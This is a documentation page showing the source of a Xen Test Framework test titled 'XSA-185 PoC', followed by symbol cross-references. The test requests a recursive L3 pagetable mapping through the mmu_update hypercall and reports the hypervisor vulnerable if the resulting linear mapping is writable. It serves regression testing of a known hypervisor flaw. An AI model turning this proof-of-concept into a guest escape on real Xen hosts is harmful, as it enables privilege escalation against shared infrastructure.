docs/xtf/xsa-185_2main_8c_source.html

 #include <xtf.h>

 const char test_title[] = "XSA-185 PoC";

 void test_main(void)
 {
     paddr_t cr3_paddr = (paddr_t)xen_cr3_to_pfn(read_cr3()) << PAGE_SHIFT;

      /*
       * Force the use of slot 2.
       *
       * Slots 0 and 3 are definitely in use, and we only have 4 to choose
       * from.  Lets hope that nothing import is using the 3rd GB of virtual
       * address space.
       */
     unsigned long map_slot = 2;

     mmu_update_t mu =
         {
             .ptr = cr3_paddr + (map_slot * PAE_PTE_SIZE),
             .val = cr3_paddr | PF_SYM(AD, U, P),
         };

     printk("  Creating recursive l3 mapping\n");
     if ( hypercall_mmu_update(&mu, 1, NULL, DOMID_SELF) )
     {
         printk("  Attempt to create recursive l3 mapping was blocked\n");
         return xtf_success("Not vulerable to XSA-185\n");
     }

     /* Construct a pointer in the linear map to l3 table. */
     intpte_t *l3_linear = _p(map_slot << L3_PT_SHIFT |
                              map_slot << L2_PT_SHIFT |
                              map_slot << L1_PT_SHIFT);

     if ( l3_linear[map_slot] & PF_SYM(RW) )
         return xtf_failure("Fail: l3 linear mapping is RW\n");
     else
         return xtf_error("Error: l3 linear mapping is not RW, but wasn't blocked\n");
 }

 /*
  * Local variables:
  * mode: C
  * c-file-style: "BSD"
  * c-basic-offset: 4
  * tab-width: 4
  * indent-tabs-mode: nil
  * End:
  */
xen_cr3_to_pfn
static unsigned int xen_cr3_to_pfn(unsigned int cr3)
Definition: xen-x86_32.h:72

L2_PT_SHIFT
#define L2_PT_SHIFT
Definition: page.h:67

printk
void printk(const char *fmt,...)
Definition: console.c:134

PF_SYM
#define PF_SYM(...)
Create pagetable entry flags based on mnemonics.
Definition: symbolic-const.h:108

mmu_update::ptr
uint64_t ptr
Definition: xen.h:249

mmu_update
Definition: xen.h:245

NULL
#define NULL
Definition: stddef.h:12

xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38

PAE_PTE_SIZE
#define PAE_PTE_SIZE
PAE pagetable entries are 64 bits wide.
Definition: page-pae.h:14

read_cr3
static unsigned long read_cr3(void)
Definition: lib.h:243

xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94

test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137

hypercall_mmu_update
static long hypercall_mmu_update(const mmu_update_t reqs[], unsigned int count, unsigned int *done, unsigned int foreigndom)
Definition: hypercall.h:60

intpte_t
unsigned long intpte_t
Definition: page.h:152

test_title
const char test_title[]
The title of the test.
Definition: main.c:14

PAGE_SHIFT
#define PAGE_SHIFT
Definition: page.h:10

_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48

L1_PT_SHIFT
#define L1_PT_SHIFT
Definition: page.h:66

xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80

DOMID_SELF
#define DOMID_SELF
Definition: xen.h:70

paddr_t
uint64_t paddr_t
Definition: page.h:96